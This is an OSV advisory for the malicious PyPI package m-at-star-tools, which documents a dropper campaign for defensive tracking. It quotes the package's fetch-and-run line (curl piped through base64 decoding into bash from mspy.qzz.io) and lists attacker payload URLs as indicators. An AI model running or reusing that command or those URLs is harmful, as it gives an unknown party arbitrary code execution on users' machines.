MAL-2026-4812

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/m-at-star-tools/MAL-2026-4812.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4812
Published
2026-05-26T10:43:03Z
Modified
2026-06-15T03:00:55.074895301Z
Summary
Malicious code in m-at-star-tools (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)

The package's sole console_script m0scan (m0scan/main.py:6-7) executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (mspy.qzz.io) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.

Source: kam193 (1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1)

The package downloads remote encoded code, which then downloads the next encrypted stage. The encryption of final data requires knowing a code.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-m-at-star-tools

Reasons (based on the campaign):

  • Downloads and executes a remote malicious script.

  • obfuscation

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.4"
            ],
            "sha256": "2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2",
            "modified_time": "2026-05-26T10:43:03Z",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T13:32:46.10000306Z",
            "id": "IN-MAL-2026-004898"
        },
        {
            "versions": [
                "1.0.0",
                "1.0.3",
                "1.0.4"
            ],
            "sha256": "1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1",
            "modified_time": "2026-05-26T22:36:40.683327Z",
            "source": "kam193",
            "import_time": "2026-05-26T22:55:24.733407763Z",
            "id": "pypi/2026-05-m-at-star-tools/m-at-star-tools"
        }
    ],
    "iocs": {
        "urls": [
            "https://raw.githubusercontent.com/M-AT-STAR/run/main/tspynstll_m0.nstll",
            "https://mspy.qzz.io/M0scan",
            "https://raw.githubusercontent.com/M-AT-STAR/run/main/c_stp_m0.enc",
            "https://raw.githubusercontent.com/M-AT-STAR/run/main/M0scan.tspy"
        ]
    }
}
References
Credits

Affected packages

PyPI / m-at-star-tools

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.3
1.0.4

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "m_at_star_tools-1.0.4-py3-none-any.whl",
            "hashes": {
                "sha256": "e4b1029b090a2f5e83098519a58b83a77ced0f228fe77a93fec928dfffa4ce3e",
                "md5": "e596ae1287baa87c7dc4950483ef0a26",
                "blake2b_256": "2fdf8f9f96a1efcf3d000faf15d4a554556f77cd7c030e1a0cf7e01f029fc16a"
            }
        },
        {
            "filename": "m_at_star_tools-1.0.4.tar.gz",
            "hashes": {
                "sha256": "3d5426e74f8d1b6d608a481bad70b562336b77aba121dcac289d5690befba25a",
                "md5": "b95a8631d1acdeac368fb954f65ce8b1",
                "blake2b_256": "9a83a24d3a23eb0e22d2f620588a780e7dce3003d5e7cc896e5251b9d7254c73"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "ca9746b26f972a7f8aa2b0a1823d9478ce1ca35f65f7fc41bebb125768716f11",
            "path": "m0scan/main.py",
            "tlsh": "ecd097db05592060594183c40208a6d082382e1f1b90322ab3247aaa1f224ba42d08a2"
        },
        {
            "sha256": "78f01d2cb0943fab9d5a8d05bed9fcb2caaf90b6259899e9512bb536abf04367",
            "path": "PKG-INFO",
            "tlsh": "ced022207330e0363ec30b8d40793ab0f6f912106ac1202bc4e2dee1c30aa0823d2130"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/m-at-star-tools/MAL-2026-4812.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]